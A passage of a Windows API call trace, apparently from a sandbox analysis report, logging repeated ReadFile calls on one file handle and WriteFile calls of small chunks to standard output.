(_FileHandle=1) returned 0x4c [0111.859] GetFileType (hFile=0x4c) returned 0x1 [0111.859] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.859] WriteFile (in: hFile=0x4c, lpBuffer=0x1cebcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cebcc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.859] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.859] GetFileType (hFile=0x4c) returned 0x1 [0111.859] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.859] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec1c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.859] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.859] GetFileType (hFile=0x4c) returned 0x1 [0111.859] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.859] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec6c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.859] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.859] GetFileType (hFile=0x4c) returned 0x1 [0111.859] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.859] WriteFile (in: hFile=0x4c, lpBuffer=0x1cecbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cecbc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.859] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.859] GetFileType (hFile=0x4c) returned 0x1 [0111.859] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.859] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced0c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.859] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0111.859] GetFileType (hFile=0x4c) returned 0x1 [0111.859] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.859] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced5c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced5c*, lpNumberOfBytesWritten=0x1cdd60*=0x20, lpOverlapped=0x0) returned 1 [0111.859] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.859] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdd4c | out: lpNewFilePointer=0x0) returned 1 [0111.860] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.860] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.860] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.860] GetFileType (hFile=0x4c) returned 0x1 [0111.860] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.860] GetFileType (hFile=0x4c) returned 0x1 [0111.860] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.860] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceb7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.860] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.860] GetFileType (hFile=0x4c) returned 0x1 [0111.860] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.860] WriteFile (in: hFile=0x4c, lpBuffer=0x1cebcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cebcc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.860] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.860] GetFileType (hFile=0x4c) returned 0x1 [0111.860] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.860] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, 
lpOverlapped=0x0 | out: lpBuffer=0x1cec1c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.860] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.860] GetFileType (hFile=0x4c) returned 0x1 [0111.860] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.860] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec6c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.860] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.860] GetFileType (hFile=0x4c) returned 0x1 [0111.860] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.860] WriteFile (in: hFile=0x4c, lpBuffer=0x1cecbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cecbc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.860] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.860] GetFileType (hFile=0x4c) returned 0x1 [0111.860] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.860] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced0c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.860] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.860] GetFileType (hFile=0x4c) returned 0x1 [0111.860] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.860] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced5c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced5c*, lpNumberOfBytesWritten=0x1cdd60*=0x20, lpOverlapped=0x0) returned 1 [0111.860] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.860] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdd4c | out: lpNewFilePointer=0x0) returned 1 [0111.861] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.861] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.861] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.861] GetFileType (hFile=0x4c) returned 0x1 [0111.861] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.861] GetFileType (hFile=0x4c) returned 0x1 [0111.861] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.861] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceb7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.861] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.861] GetFileType (hFile=0x4c) returned 0x1 [0111.861] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.861] WriteFile (in: hFile=0x4c, lpBuffer=0x1cebcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cebcc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.861] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.861] GetFileType (hFile=0x4c) returned 0x1 [0111.861] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.861] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec1c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.861] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.861] GetFileType (hFile=0x4c) returned 0x1 [0111.861] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.861] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec6c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.861] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.861] GetFileType (hFile=0x4c) returned 0x1 [0111.861] _get_osfhandle (_FileHandle=1) returned 
0x4c [0111.861] WriteFile (in: hFile=0x4c, lpBuffer=0x1cecbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cecbc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.861] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.861] GetFileType (hFile=0x4c) returned 0x1 [0111.861] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.861] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced0c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.861] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.861] GetFileType (hFile=0x4c) returned 0x1 [0111.861] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.861] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced5c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced5c*, lpNumberOfBytesWritten=0x1cdd60*=0x20, lpOverlapped=0x0) returned 1 [0111.861] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.861] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdd4c | out: lpNewFilePointer=0x0) returned 1 [0111.862] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.862] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.862] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.862] GetFileType (hFile=0x4c) returned 0x1 [0111.862] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.862] GetFileType (hFile=0x4c) returned 0x1 [0111.862] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.862] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceb7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) 
returned 1 [0111.862] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.862] GetFileType (hFile=0x4c) returned 0x1 [0111.862] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.862] WriteFile (in: hFile=0x4c, lpBuffer=0x1cebcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cebcc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.862] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.862] GetFileType (hFile=0x4c) returned 0x1 [0111.862] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.862] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec1c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.862] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.862] GetFileType (hFile=0x4c) returned 0x1 [0111.862] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.862] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec6c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.862] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.862] GetFileType (hFile=0x4c) returned 0x1 [0111.862] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.862] WriteFile (in: hFile=0x4c, lpBuffer=0x1cecbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cecbc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.862] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.862] GetFileType (hFile=0x4c) returned 0x1 [0111.862] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.862] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced0c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.862] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0111.862] GetFileType (hFile=0x4c) returned 0x1 [0111.862] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.862] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced5c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced5c*, lpNumberOfBytesWritten=0x1cdd60*=0x20, lpOverlapped=0x0) returned 1 [0111.862] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.862] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdd4c | out: lpNewFilePointer=0x0) returned 1 [0111.863] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.863] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.863] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.863] GetFileType (hFile=0x4c) returned 0x1 [0111.863] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.863] GetFileType (hFile=0x4c) returned 0x1 [0111.863] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.863] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceb7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.863] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.863] GetFileType (hFile=0x4c) returned 0x1 [0111.863] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.863] WriteFile (in: hFile=0x4c, lpBuffer=0x1cebcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cebcc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.863] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.863] GetFileType (hFile=0x4c) returned 0x1 [0111.863] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.863] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec1c*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec1c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.863] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.863] GetFileType (hFile=0x4c) returned 0x1 [0111.863] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.863] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec6c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.863] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.863] GetFileType (hFile=0x4c) returned 0x1 [0111.863] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.863] WriteFile (in: hFile=0x4c, lpBuffer=0x1cecbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cecbc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.863] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.863] GetFileType (hFile=0x4c) returned 0x1 [0111.863] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.863] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced0c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.863] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.863] GetFileType (hFile=0x4c) returned 0x1 [0111.863] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.863] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced5c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced5c*, lpNumberOfBytesWritten=0x1cdd60*=0x20, lpOverlapped=0x0) returned 1 [0111.863] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.863] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdd4c | out: lpNewFilePointer=0x0) returned 1 [0111.864] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.864] ReadFile 
(in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.864] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.864] GetFileType (hFile=0x4c) returned 0x1 [0111.864] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.864] GetFileType (hFile=0x4c) returned 0x1 [0111.864] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.864] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceb7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.864] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.864] GetFileType (hFile=0x4c) returned 0x1 [0111.864] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.864] WriteFile (in: hFile=0x4c, lpBuffer=0x1cebcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cebcc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.864] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.864] GetFileType (hFile=0x4c) returned 0x1 [0111.864] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.864] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec1c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.864] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.864] GetFileType (hFile=0x4c) returned 0x1 [0111.864] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.864] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec6c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.864] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.864] GetFileType (hFile=0x4c) returned 0x1 [0111.864] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0111.864] WriteFile (in: hFile=0x4c, lpBuffer=0x1cecbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cecbc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.864] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.864] GetFileType (hFile=0x4c) returned 0x1 [0111.864] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.864] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced0c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.864] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.864] GetFileType (hFile=0x4c) returned 0x1 [0111.864] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.864] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced5c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced5c*, lpNumberOfBytesWritten=0x1cdd60*=0x20, lpOverlapped=0x0) returned 1 [0111.864] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.864] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdd4c | out: lpNewFilePointer=0x0) returned 1 [0111.865] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.865] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.865] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.865] GetFileType (hFile=0x4c) returned 0x1 [0111.865] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.865] GetFileType (hFile=0x4c) returned 0x1 [0111.865] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.865] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceb7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, 
lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.865] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.865] GetFileType (hFile=0x4c) returned 0x1 [0111.865] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.865] WriteFile (in: hFile=0x4c, lpBuffer=0x1cebcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cebcc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.865] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.865] GetFileType (hFile=0x4c) returned 0x1 [0111.865] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.865] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec1c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.865] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.865] GetFileType (hFile=0x4c) returned 0x1 [0111.865] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.865] WriteFile (in: hFile=0x4c, lpBuffer=0x1cec6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cec6c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.865] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.865] GetFileType (hFile=0x4c) returned 0x1 [0111.865] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.865] WriteFile (in: hFile=0x4c, lpBuffer=0x1cecbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cecbc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.865] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.865] GetFileType (hFile=0x4c) returned 0x1 [0111.865] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.865] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced0c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, 
lpOverlapped=0x0) returned 1 [0111.865] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.865] GetFileType (hFile=0x4c) returned 0x1 [0111.865] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.865] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced5c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ced5c*, lpNumberOfBytesWritten=0x1cdd60*=0x20, lpOverlapped=0x0) returned 1 [0111.866] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.866] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdd4c | out: lpNewFilePointer=0x0) returned 1 [0111.866] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.866] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.866] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.866] GetFileType (hFile=0x4c) returned 0x1 [0111.866] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.866] GetFileType (hFile=0x4c) returned 0x1 [0111.866] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.866] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceb7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.866] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.866] GetFileType (hFile=0x4c) returned 0x1 [0111.866] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.866] WriteFile (in: hFile=0x4c, lpBuffer=0x1cebcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdd60, lpOverlapped=0x0 | out: lpBuffer=0x1cebcc*, lpNumberOfBytesWritten=0x1cdd60*=0x50, lpOverlapped=0x0) returned 1 [0111.866] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.866] GetFileType (hFile=0x4c) returned 0x1 [0111.866] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.866] WriteFile (in: hFile=0x4c, 
